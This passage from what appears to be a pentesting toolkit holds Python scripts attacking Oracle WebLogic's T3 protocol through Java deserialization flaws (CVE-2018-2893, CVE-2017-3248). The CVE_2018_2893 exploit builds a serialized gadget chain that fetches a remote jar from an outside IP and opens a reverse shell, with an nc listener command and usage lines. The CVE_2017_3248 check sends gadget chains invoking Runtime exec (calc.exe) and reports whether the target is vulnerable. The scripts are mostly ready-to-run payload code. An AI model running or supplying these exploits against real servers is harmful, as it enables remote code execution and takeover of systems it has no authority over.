'000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 32 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 33 | data3 = '1a7727000d3234322e323134' 34 | data4 = '2e312e32353461863d1d0000000078' 35 | for d in [data1,data2,data3,data4]: 36 | sock.send(d.decode('hex')) 37 | time.sleep(2) 38 | 39 | 40 | 41 | def sendEvilObjData(sock,data): 42 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 43 | payload+=data 44 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 45 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 46 | sock.send(payload.decode('hex')) 47 | time.sleep(2) 48 | sock.send(payload.decode('hex')) 49 | res = '' 50 | try: 51 | while True: 52 | res += sock.recv(4096) 53 | time.sleep(0.1) 54 | except Exception as e: 55 | pass 56 | return res 57 | 58 | def checkVul(res,server_addr,index): 59 | p=re.findall(VER_SIG[index], res, re.S) 60 | if len(p)>0: 61 | # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 62 | print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) 63 | else: 64 | # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 65 | # pass 66 | # print (u'目标weblogic未检测到:{}'.format(VUL[index])) 67 | print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) 68 | 69 | def run(dip,dport,index): 70 | try: 71 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 72 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 73 | sock.settimeout(10) 74 | server_addr = (dip, dport) 75 | t3handshake(sock, server_addr) 76 | buildT3RequestObject(sock, dport) 77 | rs = sendEvilObjData(sock, PAYLOAD[index]) 78 | # print 'rs',rs 79 | checkVul(rs, server_addr, index) 80 | except Exception: 81 | print("CVE_2018_2893脚本出错") 82 | if __name__=="__main__": 83 | # dip = sys.argv[1] 84 | # dport = int(sys.argv[2]) 85 | # run(dip,dport,0) 86 | rip = '127.0.0.1' 87 | rport = 7001 88 | run(rip,rport,0) -------------------------------------------------------------------------------- /plugins/weblogic_exp/CVE_2018_2893.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import os 13 | import sys 14 | import struct 15 | ''' 16 | 可以直接反弹shell 17 | 监听 18 | nc -lvvp reverse_port 19 | 发送payload 20 | python weblogic.py target_host target_port reverse_host reverse_port 21 | ''' 22 | 23 | if len(sys.argv) < 4: 24 | print 'Usage: python %s ' % os.path.basename(sys.argv[0]) 25 | sys.exit() 26 | 27 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | sock.settimeout(5) 29 | 30 | host = sys.argv[1] 31 | port = int(sys.argv[2]) 32 | 33 | server_address = (host, port) 34 | print '[+] Connecting to %s port %s' % server_address 35 | sock.connect(server_address) 36 | 37 | 38 | reverse_host = sys.argv[3] 39 | reverse_port = int(sys.argv[4]) 40 | # Send headers 41 | headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' 42 | print 'sending "%s"' % headers 43 | sock.sendall(headers) 44 | 45 | data = sock.recv(1024) 46 | print >>sys.stderr, 'received "%s"' % data 47 | 48 | 49 | def padhex(s): 50 | s = s.strip('0x') 51 | if len(s) %2 !=0: 52 | return '0'+s 53 | else: 54 | return s 55 | 56 | host_hex = padhex(hex(len(reverse_host))+reverse_host.encode('hex')) 57 | port_hex = padhex(hex(reverse_port)) 58 | 59 | 60 | payloadObj = """aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173734c6f61646572000000000000000000000078707372003e6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017572000f5b4c6a6176612e6e65742e55524c3b5251fd24c51b68cd0200007870000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e001c4c0004686f737471007e001c4c000870726f746f636f6c71007e001c4c000372656671007e001c7870ffffffffffffffff74000f3137362e3132322e3135372e3131307400132f4a657852656d6f7465546f6f6c732e6a617271007e001e740004687474707078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000017671007e00197372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b0005694172677371007e00144c000b694d6574686f644e616d6571007e001c5b000b69506172616d547970657371007e001578707571007e00170000000174000a4a6578526576657273657400096c6f6164436c6173737571007e002100000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e0017000000027400%s737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000%s7571007e00210000000271007e002b76720003696e7400000000000000000000007870737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"""%(host_hex,port_hex) 61 | 62 | 63 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 64 | payload=payload+payloadObj.decode('hex') 65 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 66 | 67 | # adjust header for appropriate message length 68 | payload=struct.pack('>I',len(payload)) + payload[4:] 69 | 70 | print '[+] Sending payload...' 71 | sock.send(payload) 72 | data = sock.recv(2048) 73 | print >>sys.stderr, 'received "%s"' % data 74 | -------------------------------------------------------------------------------- /plugins/weblogic_poc/CVE_2017_3248.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | 15 | VUL=['CVE-2017-3248'] 16 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78','aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 17 | VER_SIG=['\\$Proxy[0-9]+'] 18 | def t3handshake(sock,server_addr): 19 | sock.connect(server_addr) 20 | sock.settimeout(7) 21 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 22 | time.sleep(1) 23 | sock.recv(1024) 24 | # print 'handshake successful' 25 | def buildT3RequestObject(sock,rport): 26 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 27 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 28 | data3 = '1a7727000d3234322e323134' 29 | data4 = '2e312e32353461863d1d0000000078' 30 | for d in [data1,data2,data3,data4]: 31 | sock.send(d.decode('hex')) 32 | time.sleep(2) 33 | # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) 34 | def sendEvilObjData(sock,data): 35 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 36 | payload+=data 37 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 38 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 39 | sock.send(payload.decode('hex')) 40 | res = '' 41 | try: 42 | while True: 43 | res += sock.recv(4096) 44 | time.sleep(0.1) 45 | except Exception as e: 46 | pass 47 | return res 48 | def checkVul(res,server_addr,index): 49 | p=re.findall(VER_SIG[index], res, re.S) 50 | if len(p)>0: 51 | # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) 52 | print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) 53 | else: 54 | # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) 55 | print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) 56 | def run(rip,rport,index): 57 | try: 58 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 59 | ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 60 | sock.settimeout(10) 61 | 